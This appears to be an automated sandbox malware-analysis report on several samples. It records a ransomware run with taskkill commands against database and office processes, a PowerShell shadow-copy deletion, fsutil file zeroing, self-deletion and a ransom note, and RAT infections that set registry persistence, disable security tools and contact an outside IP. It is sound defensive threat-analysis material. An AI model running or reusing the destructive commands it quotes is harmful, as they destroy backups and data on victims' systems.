C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM visio.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM winword.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mysqld-nt.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM wordpad.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mysqld-opt.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM ocautoupds.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM ocssd.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM oracle.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlagent.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlbrowser.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlservr.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM synctime.exe /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/1028-0-0x00007FFD67193000-0x00007FFD67195000-memory.dmp

memory/1028-1-0x0000000000730000-0x000000000074A000-memory.dmp

memory/1028-3-0x00007FFD67190000-0x00007FFD67C51000-memory.dmp

memory/4692-19-0x00000230C8330000-0x00000230C8352000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dvtby10x.k3r.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]

MD5 cbbf79db61d84b1d8e89290d609af651
SHA1 903b3cad300761c100344ff5e16bd80ce95e68e3
SHA256 1cba03a296b50d895144de87f24f70b23a0b59f9ac16bd15d84be6f069b5dbf9
SHA512 48775e313dfc1b595e117072ac98578c1df13c3bd9fa070031806d756ee4f7c8e2923ccf17c057cf7ae3e743d3b5acd2f74338c569af4cc1be69c45286bdd0d0

C:\ProgramData\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\dotnet-runtime-6.0.27-win-x64.msi

MD5 90a3223035e338dca34924e7bf613ce1
SHA1 ad298fdbeb7b99f9db991eac4ef9c63cc58532d3
SHA256 00fe7ba9c160449aa6b3550529c128aa9df7ebe683ea11aea85ee1233771b902
SHA512 561769ef89cd23185fbf213beab20dced69216dedd953f01493a3baf56ba00e8862798c70e57589f6b3b1da53e06a753c3757f1d757e853f91385db3e095a80d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/1028-185-0x00007FFD67193000-0x00007FFD67195000-memory.dmp

C:\ProgramData\Package Cache\{2BB73336-4F69-4141-9797-E9BD6FE3980A}v64.8.8795\dotnet-host-8.0.2-win-x64.msi.energy[[email protected]]

MD5 7e4ea750cbfdde5afd5216ace419e6ff
SHA1 0ce33c91a6a5df2bb9e9b05e76ad3dc2b35526a4
SHA256 b1af658bde0bf6c9ef4da02fe336727d9627e4c0f20c464494d4971b644e1e0a
SHA512 c1d405bc62644ccfdc66bdedad667ecc1ec477c12c2129148d8c61fef49f51a497c7ee3ea59f472440708f7c8f1c3a4fd24d0ff2492ae4337e6d353ea188db6e

C:\ProgramData\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\windowsdesktop-runtime-7.0.16-win-x64.msi

MD5 dab93a4f8fc273a0f87a991ea745dd31
SHA1 77dc042edc8d88172bc157c2fc803511d716276f
SHA256 4c28f478ae0283a44488cfce196f530e0b372eb3643309d6028147afa57e136f
SHA512 805d19c41ee1d529d20e52cde23bcf70e3c225c771d160a44cf1f3c91544c40518703dc595134ba058fbc1f3be54de288be72cbc3001af226f7bb2e0898fc657

memory/1028-311-0x00007FFD67190000-0x00007FFD67C51000-memory.dmp

C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log

MD5 1107afb98f12d360e82ce365284075c6
SHA1 ba3ac7cb0cfcf7d4fe8858b162f17c782f92abf0
SHA256 1025b478742aeba76c1ba5d1f0acef058a0f0319ed1d0124f51b631880148942
SHA512 02f3c70b063e975b5916e6f2d9f2641633a5adfee453087b364e0bbbefe43c01b09cadc12e3e0fc921d37c4716144c7eee7ee321d493d64b4e885f00a0a9fb08

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

MD5 e522c8a14a3ce0e12b2979b1b3b36c68
SHA1 97099c66a83f317b9c4773b308da4232b32f7d41
SHA256 4edb67a8b5def5e3a332f7de3401829ae6a95a1b24cabac1161ccb5cff90738c
SHA512 bb9842f2d3f014c1f7ae711f572b5d9a18d627f38e0cc891b8e812f08bc27ee208191678743a847edd38f74e3117e223dd84711fb675a08cc9800e706722cc61

memory/1028-543-0x00007FFD67190000-0x00007FFD67C51000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win7-20240903-en

Max time kernel

117s

Max time network

121s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2132 wrote to memory of 2732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 2732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 2732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 2732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 2732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 2732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 2732 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win10v2004-20241007-en

Max time kernel

90s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe

"C:\Users\Admin\AppData\Local\Temp\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4912 -ip 4912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 1620

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
RU 217.8.117.77:80 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/4912-0-0x00000000747AE000-0x00000000747AF000-memory.dmp

memory/4912-1-0x0000000000D00000-0x0000000000D60000-memory.dmp

memory/4912-2-0x0000000005C20000-0x00000000061C4000-memory.dmp

memory/4912-3-0x0000000005750000-0x00000000057E2000-memory.dmp

memory/4912-5-0x0000000005800000-0x000000000580A000-memory.dmp

memory/4912-4-0x00000000747A0000-0x0000000074F50000-memory.dmp

memory/4912-6-0x0000000008580000-0x0000000008AAC000-memory.dmp

memory/4912-7-0x0000000006B40000-0x0000000006B5C000-memory.dmp

memory/4912-8-0x00000000747AE000-0x00000000747AF000-memory.dmp

memory/4912-9-0x00000000747A0000-0x0000000074F50000-memory.dmp

memory/4912-10-0x00000000082E0000-0x000000000832C000-memory.dmp

memory/4912-11-0x00000000083D0000-0x000000000846C000-memory.dmp

memory/4912-12-0x00000000747A0000-0x0000000074F50000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Babylon RAT

trojan babylonrat

Babylonrat family

babylonrat

Darkcomet

trojan rat darkcomet

Darkcomet family

darkcomet

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\Documents\\excelsl.exe" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\k4Xq51JTS0f2R98Z\\6Q4I1MV1lCmG.exe\",explorer.exe" C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\k4Xq51JTS0f2R98Z\\2xDd37LqYA4R.exe\",explorer.exe" C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe N/A

Njrat family

njrat

WarzoneRat, AveMaria

rat infostealer warzonerat

Warzonerat family

warzonerat

njRAT/Bladabindi

trojan njrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Warzone RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Disables Task Manager via registry modification

evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\oST3o0r4xkZE2L8O.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d790bed038373d95093d4db590b9997.exe C:\Windows\svehosts.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d790bed038373d95093d4db590b9997.exe C:\Windows\svehosts.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2d790bed038373d95093d4db590b9997 = "\"C:\\Windows\\svehosts.exe\" .." C:\Windows\svehosts.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\2d790bed038373d95093d4db590b9997 = "\"C:\\Windows\\svehosts.exe\" .." C:\Windows\svehosts.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\office = "C:\\Users\\Admin\\Documents\\excelsl.exe" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\office = "C:\\Users\\Admin\\Documents\\excelsl.exe" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\svehosts.exe C:\Users\Admin\AppData\Local\Temp\oST3o0r4xkZE2L8O.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\oST3o0r4xkZE2L8O.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\notepad.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\prndrvest.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dycXYl7o8GGBADju.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\excelsl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\notepad.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svehosts.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dycXYl7o8GGBADju.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dycXYl7o8GGBADju.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dycXYl7o8GGBADju.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\prndrvest.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mVOptS3WrpXtujKV.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\oST3o0r4xkZE2L8O.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\oST3o0r4xkZE2L8O.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IHR7LmwmAMTgAsWv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NnPgtjiBN72Uq6Qa.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LIFr7X66gAAaEBEq.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\dycXYl7o8GGBADju.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
